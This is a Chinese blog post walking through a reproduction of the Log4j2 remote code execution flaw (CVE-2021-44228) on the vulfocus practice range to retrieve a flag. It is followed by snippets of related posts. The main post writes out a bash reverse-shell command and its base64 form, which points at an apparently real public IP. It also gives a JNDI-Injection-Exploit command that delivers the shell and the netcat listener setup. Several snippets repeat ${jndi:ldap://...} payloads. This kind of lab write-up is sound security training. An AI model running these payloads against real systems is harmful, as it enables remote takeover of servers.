log4j2远程执行代码CVE-2021-44228复现(vulfocus靶场)

最新推荐文章于 2024-08-01 21:21:39 发布
最新推荐文章于 2024-08-01 21:21:39 发布
阅读量400 收藏 3
点赞数 5
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74294234/article/details/137188160
版权

一:工具下载

百度网盘链接:百度网盘 请输入提取码8888

 二:vps服务器(因为反弹shell时候需要用到公网)

我这里使用的是阿里云的轻量化服务器;(所谓的云服务器就是你去阿里云或腾讯云的平台购买一台云服务器)

这里对于小白来说有一个哔哩哔哩小视频可以供你们参考一下,里面包括购买vps服务器和finalshell终端

全网最快!6分钟教你从配置服务器到搭建网站!_哔哩哔哩_bilibili

三:复现过程

1:首先打开finalshell或其他本地服务器上传,先创建一个ddd文件夹,并把下载的工具转移到该目录

2:进入该目录下

3:执行以下代码:

注意:执行前要确保你的服务器安装了java环境:

sudo yum install java-1.8.0-openjdk-devel

bash -i >& /dev/tcp/(你服务器的公网IP地址)/8888(监听的端口号,我这里使用的是8888端口) 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzYuMjMxLjczLzg4ODggMD4mMQ==(这是上一行代码的base64编码)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzYuMjMxLjczLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" -A "(你服务器的公网IP地址)"

4:开放所有端口(1~65535)

5:打开另一个终端端口并开启监听8888端口(8888端口是你在前面设置的监听端口)

这里有几个点:若你还没有安装ncat可以通过执行以下命令完成

sudo yum update#更新你的yum数据包,确保是最新的版本
sudo yum install nc #安装nc
sudo yum install namp-ncat#安装nmap-ncat

5:到vulfocus靶场        

6:用burpsuite抓包

发送到repeater,然后修改payload,最后按send提交

如果出现右边界面200+ok则是发送成功

本地服务器第一个端口会出现

第二个端口会出现

这样子就成功监听到端口,先进入tmp目录下,在输入ls可以爆出flag;

将flag复制粘贴到vulfocus靶场中即可。

九号帆船
关注
log4j2漏洞原理分析及复现-CVE-2021-44228vulfocus靶场
yang1234567898的博客
04-18 3237
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器执行任意代码。JNDI简单介绍JNDI(Java Na
2024年网络安全最新如何利用little红书数据爬取分析(仅数据分析)(1),大厂面经合集
2401_84265909的博客
05-07 295
爬取的数据包括评论者昵称,id,评论级别,评论内容先上个图。
log4j2 远程代码执行漏洞复现CVE-2021-44228
2301_76631050的博客
08-01 1034
Apache Log4j:Apache的开源项目,一个功能强大的日志组件,提供方便的日志记录Apache Log4j2:对Log4j的升级,它比其前身Log4j1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Loqback架构中的一些问题。优秀的Java日志框架;Log4j2 漏洞受影响版本:2.0到2.14.1版本中存在一处JNDI注入漏洞。
vulfocus Apache log4j2-RCE 漏洞复现CVE-2021-44228
qq_45780190的博客
12-15 5255
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发现可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,
JNDI(Java Naming and Directory Interface,Java命名和目录接口)
dengjuanshou7445的博客
08-26 326
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。目录服务是命名服务的...
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
热门推荐
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
Log4j2 远程代码执行漏洞(cve-2021-44228复现(反弹shell)
Hi~ 土拨鼠
12-16 5152
文章目录1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell 最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是做安全的嘛!今天我就来复现一下 1、构造EXP import java.io.BufferedReader; import java.io.InputStream; i
vulfocus复现Log4j2远程命令执行CVE-2021-44228)
m0_71518346的博客
12-17 849
富的特性。该日志框架被大量用于业务Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器执行任意代码
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 778
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
Vulfocus漏洞复现log4j2-cve-2021-44228
weixin_45632448的博客
04-13 4030
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:64936/ 访问靶场环境http://123.58.236.76:64936/ 点击??? burp抓包,DNSlog验证漏洞是否存在 构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400 payload=${jndi:ldap://7272sq.ceye.io} 对payload进行url编码(burp自带),再次进行请求,
vulfocus.fofa靶场Log4j2远程命令执行2
weixin_48817799的博客
12-29 5088
vulfocus.fofa靶场Log4j2远程命令执行2前言一、靶场复现总结 前言 名称: ghcr.io/christophetd/log4shell-vulnerable-app:latest 描述: log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 一、靶场复现 工具:JNDIExploit-1.3-SNAPSHOT.jar 1.打开靶场http://vulfocus.fofa.so 2.使用vps启动工具 java -jar JNDIExploit-1.3.
vulfocus复现Log4j2远程命令执行2
woai_zhongguo的博客
07-15 812
Log4j2远程命令执行2复现过程
RabbitMQ【部署 01】一篇学会RabbitMQ服务依赖的下载安装及简单使用(首次登录 User can only log in via localhost 问题处理)(1)
2301_77121488的博客
05-08 1039
也可以直接安装rabbitmq-server从报错信息里获取需要的版本,由于是同一个网站,下载的方式是一样的,这次也是直接下载安装文件。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~此时服务已经可以使用了,但是,默认情况下,RabbitMQ是没有安装WEB端插件的,需要手动积获才可以生效。点击下载,可以进行联网下载安装也可以直接进行下载,本次选择直接下载安装文件。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3515
vulfocus靶场log4j2漏洞复现
vulfocus复现log4j2-rce-2021-12-09
woai_zhongguo的博客
07-13 4747
log4j2远程rce漏洞复现
Log4j2远程命令执行2-vulfocus-wp
miojjnum的博客
12-22 3770
vulfocuslog4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 1、首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境: 输入命令开启监听: java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的vps的IP地址 -l 7000 -p 5000 2、bp抓包伺候 ...
vulfocus-fofa靶场 Log4j2远程命令执行
weixin_48817799的博客
12-29 4354
Log4j2远程命令执行前言一、Apache Log4j2是什么?二、复现步骤1.工具2.复现过程 前言 一、Apache Log4j2是什么? Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 二、复现步骤 1.工具 工具:JNDI-Inje
【安全攻防实验-4】Vulfocus练习-log4j2攻击准备
qq_26579613的博客
02-08 1244
1、环境准备 2、工具准备 2.1安装JNDI-Injection-Exploit git clone https://github.com/welk1n/JNDI-Injection-Exploit.git 2.2 安装MVN mkdip -p /usr/local/apache-maven cd /usr/local/apache-maven wget -c https://dlcdn.apache.org/maven/maven-3/3.8.4/bin...
Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)、
最新发布
08-22
Apache Log4j2是一个广泛使用的日志框架,用于Java应用程序的日志记录。CVE-2021-45105和CVE-2021-44228是针对该框架的一个严重安全漏洞,也被称为Log4Shell或Log4J RCE(Remote Code Execution)。这个漏洞源于Log4j库的一个设计缺陷,当处理某些特定类型的外部输入数据时,攻击者可以构造恶意的控制字符序列,使得日志处理器执行任意的Java代码,从而实现了远程代码执行。 攻击者可以通过受影响的应用程序访问的日志系统接口,将恶意脚本插入到日志消息中。如果应用服务器配置不当,比如默认开启了对用户提交日志的解析功能,就可能导致这种漏洞被利用,攻击者可以窃取敏感信息,甚至完全控制受影响的系统。 修复此漏洞通常需要更新到最新的Log4j2版本,并确保适当的安全配置,例如禁用不受信任的特性或者关闭日志处理器的功能。同时,也应该检查并修复所有可能受到漏洞影响的服务和组件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值